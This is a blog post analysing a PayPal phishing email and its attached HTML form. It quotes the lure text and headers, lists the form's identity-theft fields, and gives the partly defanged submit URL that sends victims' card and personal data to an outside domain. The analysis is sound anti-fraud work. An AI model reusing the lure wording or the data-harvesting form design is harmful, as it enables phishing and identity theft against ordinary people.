Beware of emails containing a PayPal Phishing scam attachment
February 20, 2014
Today, I received a suspicious email claiming to come from PayPal, with the subject: "Account Notification" - notifying me that I had to verify my account information - because of a "planned system upgrade." As I suspected, it was a Phishing scam, not only meant to steal one's PayPal credentials, but also your identity.
Here are the most important identifying features of this email scam.
PayPal Phishing Scam Email Contents
Received: from mail.xx11.com.br ([177.8.168.7])
by imta24.westchester.pa.mail.comcast.net with comcast
id UhP31n00w09uhKl0QhP56C; Thu, 20 Feb 2014 17:23:09 +0000
From: PayPal ([email protected])
Return-Path: [email protected]
Subject: Account Notification
Message body contents (text only):
PayPal Account System Upgrade Verification.Technical services of the PayPal Inc. are carrying out a planned system upgrade. We earnestly ask you to start with the procedure of confirmation on customers data.
 This email has been sent to all PayPal customers, and we ask a few minutes of your online experience. We have sent you an attachment form through this email. Please download and open it in your web browser.
 Your personal information is protected by state-of-the-art technology. After you have filled in all the required fields in the form, our verification system will automatically update your account records.
 We apologize for any inconvenience, and thank you for your time.
Please do not reply to this email. This mailbox is not monitored and you will not receive a response. For assistance, log in to your PayPal account and click Help in the top right corner of any PayPal page.
Copyright © 1999-2014 PayPal. All rights reserved.
My analysis follows.
The first thing an astute PayPal customer should look for in any email communication from the company, is a "salutation" containing their own legal name, or whatever name they used to register their PayPal account (Dear _, Attention _, etc.). This email has no salutation whatsoever!
The next giveaway is the email address in the From field. Although the word "PayPal" is displayed, the actual email address next to it is not even spoofed to read @paypal.com. Rather, the scammers have borrowed an innocent third party email account and inserted it into both the Return path and From fields. This causes bounces and angry replies to go to the person or company whose account was spoofed. We call this a "Joe Job" in spam-fighter-speak.
Those of you who know how to display the incoming headers of email messages would have noticed that the sender was a Comcast customer in Westchester, Pa, who relayed it from a mail server in Brazil. To wit:
"Received: from imta24.westchester.pa.mail.comcast.net (LHLO imta24.westchester.pa.mail.comcast.net)"
"Received: from mail.xx11.com.br ([177.8.168.7])"
The next suspicious item is this sentence: "We have sent you an attachment form through this email. Please download and open it in your web browser." PayPal doesn't do that. If you must fill out a form or update any information, they tell you to log into your PayPal account and go to this or that section and download or update it from the official PayPal website.
Now, about that attached form...
The attached file is a full-fledged html document, complete with images stolen from various PayPal servers. When opened in a browser it closely resembles an official PayPal page. Along the top is a section of button-like links, starting with "My Account," all of which do nothing if clicked. There are however a few scattered actual links to various PayPal pages, just to throw you off balance.
The call to action in this fraud begins under the bold heading: "Profile Update" - where we find this threatening sentence: "Please complete the form below to update your Profile information and restore your account access." This is meant to get recipients to begin filling in the requested (and "required" details that follow, for fear of losing access to their PayPal accounts.
So, what information do they want you to update? Look no farther than the input fields under: "Personal Information Profile" Here we find everything needed for identity theft.
Card Holder Name:
Date of Birth:
Mother's Maiden Name:
Social Security Number:
Home Phone Number:Address Line 1:
Address Line 2:
City:
State:
Zip Code:
Country:Card Number:
Expiration Date:
Card Verification Number:
At the bottom right of the form is a gold colored button, labeled: "Save Profile." That is the "submit" button that sends all of your personally identifiable information, along with your PayPal credit/debit card details and CVE code, to a domain registered in The Soviet Union. (form name="frm" action="h**p://www.informed.su/Verified.php")
I'll bet you thought that the Soviet Union was long gone. As a political entity, yes. As a legal web domain name, no. Read this:
What is .su?
.su was assigned as the country code top-level domain for the Soviet Union on September 19, 1990. It remains in use today, even though the Soviet Union itself no longer exists, and is administered by the Russian Institute for Public Networks (RIPN, or RosNIIROS in Russian transcription).
(snip)
In Soviet Union the official language is Russian.
As I finished this article, I discovered that the domain "informed.su" has been deactivated, following SpamCop reports from me and other spam fighters (You tried to visit informed.su, which is not loading.).
I pray that none of my readers fell victim to this phishing scam. If you have, please log into your PayPal account and change the password and request a new credit/debit card. You might also want to start monitoring your credit reports for attempts to open new accounts from abroad.
If you like this article please share it.
The content on this blog may be reprinted provided you do not modify the content and that you give credit to Wizcrafts and provide a link back to the blog home page, or individual blog articles you wish to reprint. Commercial use, or derivative work requires written permission from the author.